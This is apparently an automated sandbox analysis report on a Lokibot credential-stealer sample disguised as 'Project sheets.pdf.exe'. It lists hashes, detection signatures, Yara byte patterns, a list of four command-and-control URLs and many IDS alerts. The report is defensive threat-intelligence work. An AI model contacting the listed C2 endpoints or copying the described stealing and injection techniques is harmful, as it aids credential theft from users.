Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Project sheets.pdf.exe

Overview

General Information

Sample Name:Project sheets.pdf.exe
Analysis ID:682148
MD5:b9ff215d1d69d1a6d7568eecc3ecd245
SHA1:6f17bbed238dc4571db8b43fad392c6ef3b88fa5
SHA256:c06061604c0d1be02e69e00ada53ceb9e2d5ba9d47f93fc20cafa149513a12e1
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Detected potential unwanted application
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Project sheets.pdf.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\Project sheets.pdf.exe" MD5: B9FF215D1D69D1A6D7568EECC3ECD245)
    • cvtres.exe (PID: 5896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
    • cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
    • cvtres.exe (PID: 3896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
    • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
    00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 56 entries
          SourceRuleDescriptionAuthorStrings
          3.0.cvtres.exe.400000.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          3.0.cvtres.exe.400000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x13e80:$s2: https://
          • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          3.0.cvtres.exe.400000.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.0.cvtres.exe.400000.4.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              3.0.cvtres.exe.400000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 113 entries
                No Sigma rule has matched
                Timestamp:192.168.2.3188.114.97.349852802025381 08/11/22-06:43:38.361573
                SID:2025381
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349817802021641 08/11/22-06:43:11.901228
                SID:2021641
                Source Port:49817
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802825766 08/11/22-06:42:50.570997
                SID:2825766
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802024313 08/11/22-06:42:53.219319
                SID:2024313
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802024318 08/11/22-06:43:09.287221
                SID:2024318
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802024313 08/11/22-06:43:13.321407
                SID:2024313
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349885802021641 08/11/22-06:43:55.376397
                SID:2021641
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802024318 08/11/22-06:42:25.207102
                SID:2024318
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349760802024318 08/11/22-06:42:32.923604
                SID:2024318
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349754802025381 08/11/22-06:42:26.308314
                SID:2025381
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802024313 08/11/22-06:43:09.287221
                SID:2024313
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349884802825766 08/11/22-06:43:54.330408
                SID:2825766
                Source Port:49884
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349760802024313 08/11/22-06:42:32.923604
                SID:2024313
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349888802024313 08/11/22-06:44:00.133246
                SID:2024313
                Source Port:49888
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802021641 08/11/22-06:43:06.576803
                SID:2021641
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802024313 08/11/22-06:43:24.421881
                SID:2024313
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802021641 08/11/22-06:42:21.832277
                SID:2021641
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349895802825766 08/11/22-06:44:06.157277
                SID:2825766
                Source Port:49895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802021641 08/11/22-06:42:15.052087
                SID:2021641
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802825766 08/11/22-06:43:05.379365
                SID:2825766
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349743802024312 08/11/22-06:42:14.045456
                SID:2024312
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349790802025381 08/11/22-06:42:56.651534
                SID:2025381
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802021641 08/11/22-06:43:16.837786
                SID:2021641
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802024318 08/11/22-06:43:24.421881
                SID:2024318
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802025381 08/11/22-06:43:45.824252
                SID:2025381
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349796802024318 08/11/22-06:43:04.193279
                SID:2024318
                Source Port:49796
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349796802024313 08/11/22-06:43:04.193279
                SID:2024313
                Source Port:49796
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802021641 08/11/22-06:43:40.660156
                SID:2021641
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349890802825766 08/11/22-06:44:03.457387
                SID:2825766
                Source Port:49890
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802024318 08/11/22-06:42:30.656105
                SID:2024318
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802024313 08/11/22-06:42:34.002289
                SID:2024313
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802024313 08/11/22-06:42:30.656105
                SID:2024313
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802024318 08/11/22-06:42:46.945645
                SID:2024318
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802825766 08/11/22-06:43:45.824252
                SID:2825766
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802024318 08/11/22-06:42:34.002289
                SID:2024318
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349743802024317 08/11/22-06:42:14.045456
                SID:2024317
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349754802825766 08/11/22-06:42:26.308314
                SID:2825766
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349789802825766 08/11/22-06:42:55.412963
                SID:2825766
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802021641 08/11/22-06:44:07.789189
                SID:2021641
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802024313 08/11/22-06:42:25.207102
                SID:2024313
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802025381 08/11/22-06:43:05.379365
                SID:2025381
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349790802825766 08/11/22-06:42:56.651534
                SID:2825766
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349888802024318 08/11/22-06:44:00.133246
                SID:2024318
                Source Port:49888
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802021641 08/11/22-06:42:18.537201
                SID:2021641
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349843802024318 08/11/22-06:43:31.924022
                SID:2024318
                Source Port:49843
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349780802025381 08/11/22-06:42:49.154690
                SID:2025381
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349884802025381 08/11/22-06:43:54.330408
                SID:2025381
                Source Port:49884
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349889802024313 08/11/22-06:44:01.764745
                SID:2024313
                Source Port:49889
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349762802025381 08/11/22-06:42:35.961537
                SID:2025381
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802021641 08/11/22-06:42:12.661275
                SID:2021641
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802024318 08/11/22-06:42:24.044623
                SID:2024318
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802025381 08/11/22-06:43:03.020333
                SID:2025381
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802024313 08/11/22-06:42:24.044623
                SID:2024313
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349789802025381 08/11/22-06:42:55.412963
                SID:2025381
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349843802021641 08/11/22-06:43:31.924022
                SID:2021641
                Source Port:49843
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349745802021641 08/11/22-06:42:16.160936
                SID:2021641
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349889802024318 08/11/22-06:44:01.764745
                SID:2024318
                Source Port:49889
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802025381 08/11/22-06:43:10.662100
                SID:2025381
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349762802825766 08/11/22-06:42:35.961537
                SID:2825766
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349890802025381 08/11/22-06:44:03.457387
                SID:2025381
                Source Port:49890
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802021641 08/11/22-06:42:41.209817
                SID:2021641
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802021641 08/11/22-06:42:20.745320
                SID:2021641
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802021641 08/11/22-06:43:53.308240
                SID:2021641
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802025381 08/11/22-06:42:28.447484
                SID:2025381
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349800802024313 08/11/22-06:43:08.046752
                SID:2024313
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802024313 08/11/22-06:42:42.773950
                SID:2024313
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802825766 08/11/22-06:43:48.403290
                SID:2825766
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802825766 08/11/22-06:43:47.334573
                SID:2825766
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802025381 08/11/22-06:42:17.452589
                SID:2025381
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802021641 08/11/22-06:42:46.945645
                SID:2021641
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349897802025381 08/11/22-06:44:08.828123
                SID:2025381
                Source Port:49897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349832802025381 08/11/22-06:43:19.747801
                SID:2025381
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802024318 08/11/22-06:43:51.663595
                SID:2024318
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349759802025381 08/11/22-06:42:31.695874
                SID:2025381
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802024313 08/11/22-06:43:51.663595
                SID:2024313
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802825766 08/11/22-06:42:27.395952
                SID:2825766
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802025381 08/11/22-06:42:50.570997
                SID:2025381
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349800802024318 08/11/22-06:43:08.046752
                SID:2024318
                Source Port:49800
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802021641 08/11/22-06:42:45.276948
                SID:2021641
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349895802025381 08/11/22-06:44:06.157277
                SID:2025381
                Source Port:49895
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802825766 08/11/22-06:42:58.117986
                SID:2825766
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802024313 08/11/22-06:42:39.324991
                SID:2024313
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802024318 08/11/22-06:43:06.576803
                SID:2024318
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802024318 08/11/22-06:42:39.324991
                SID:2024318
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349792802025381 08/11/22-06:42:59.404301
                SID:2025381
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802025381 08/11/22-06:43:42.759258
                SID:2025381
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802021641 08/11/22-06:43:50.015660
                SID:2021641
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802021641 08/11/22-06:43:28.505356
                SID:2021641
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802024313 08/11/22-06:42:44.099150
                SID:2024313
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802025381 08/11/22-06:42:42.773950
                SID:2025381
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802025381 08/11/22-06:42:29.610436
                SID:2025381
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802024318 08/11/22-06:42:44.099150
                SID:2024318
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802021641 08/11/22-06:43:47.334573
                SID:2021641
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802825766 08/11/22-06:43:58.405291
                SID:2825766
                Source Port:49887
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802024313 08/11/22-06:43:10.662100
                SID:2024313
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802025381 08/11/22-06:42:41.209817
                SID:2025381
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349789802024313 08/11/22-06:42:55.412963
                SID:2024313
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349792802825766 08/11/22-06:42:59.404301
                SID:2825766
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802025381 08/11/22-06:42:27.395952
                SID:2025381
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349762802021641 08/11/22-06:42:35.961537
                SID:2021641
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802825766 08/11/22-06:44:04.916628
                SID:2825766
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802024313 08/11/22-06:43:06.576803
                SID:2024313
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349888802021641 08/11/22-06:44:00.133246
                SID:2021641
                Source Port:49888
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349760802021641 08/11/22-06:42:32.923604
                SID:2021641
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802825766 08/11/22-06:42:12.661275
                SID:2825766
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349832802021641 08/11/22-06:43:19.747801
                SID:2021641
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349897802021641 08/11/22-06:44:08.828123
                SID:2021641
                Source Port:49897
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802024313 08/11/22-06:42:15.052087
                SID:2024313
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349743802021641 08/11/22-06:42:14.045456
                SID:2021641
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349889802825766 08/11/22-06:44:01.764745
                SID:2825766
                Source Port:49889
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349796802021641 08/11/22-06:43:04.193279
                SID:2021641
                Source Port:49796
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802021641 08/11/22-06:43:24.421881
                SID:2021641
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802024318 08/11/22-06:43:16.837786
                SID:2024318
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802024313 08/11/22-06:43:40.660156
                SID:2024313
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802825766 08/11/22-06:44:09.907279
                SID:2825766
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802021641 08/11/22-06:43:33.879385
                SID:2021641
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802024313 08/11/22-06:43:42.759258
                SID:2024313
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802024318 08/11/22-06:42:54.331478
                SID:2024318
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349790802021641 08/11/22-06:42:56.651534
                SID:2021641
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349832802825766 08/11/22-06:43:19.747801
                SID:2825766
                Source Port:49832
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802024318 08/11/22-06:43:42.759258
                SID:2024318
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802024313 08/11/22-06:43:16.837786
                SID:2024313
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349743802825766 08/11/22-06:42:14.045456
                SID:2825766
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802025381 08/11/22-06:42:51.879415
                SID:2025381
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802021641 08/11/22-06:42:30.656105
                SID:2021641
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.97.3192.168.2.380497972025483 08/11/22-06:43:05.476572
                SID:2025483
                Source Port:80
                Destination Port:49797
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802025381 08/11/22-06:42:21.832277
                SID:2025381
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802825766 08/11/22-06:42:41.209817
                SID:2825766
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349888802825766 08/11/22-06:44:00.133246
                SID:2825766
                Source Port:49888
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802825766 08/11/22-06:43:33.879385
                SID:2825766
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349890802024313 08/11/22-06:44:03.457387
                SID:2024313
                Source Port:49890
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802825766 08/11/22-06:42:34.002289
                SID:2825766
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802025381 08/11/22-06:44:04.916628
                SID:2025381
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349789802024318 08/11/22-06:42:55.412963
                SID:2024318
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802021641 08/11/22-06:43:58.405291
                SID:2021641
                Source Port:49887
                Destination Port:80
                Protocol:TCP
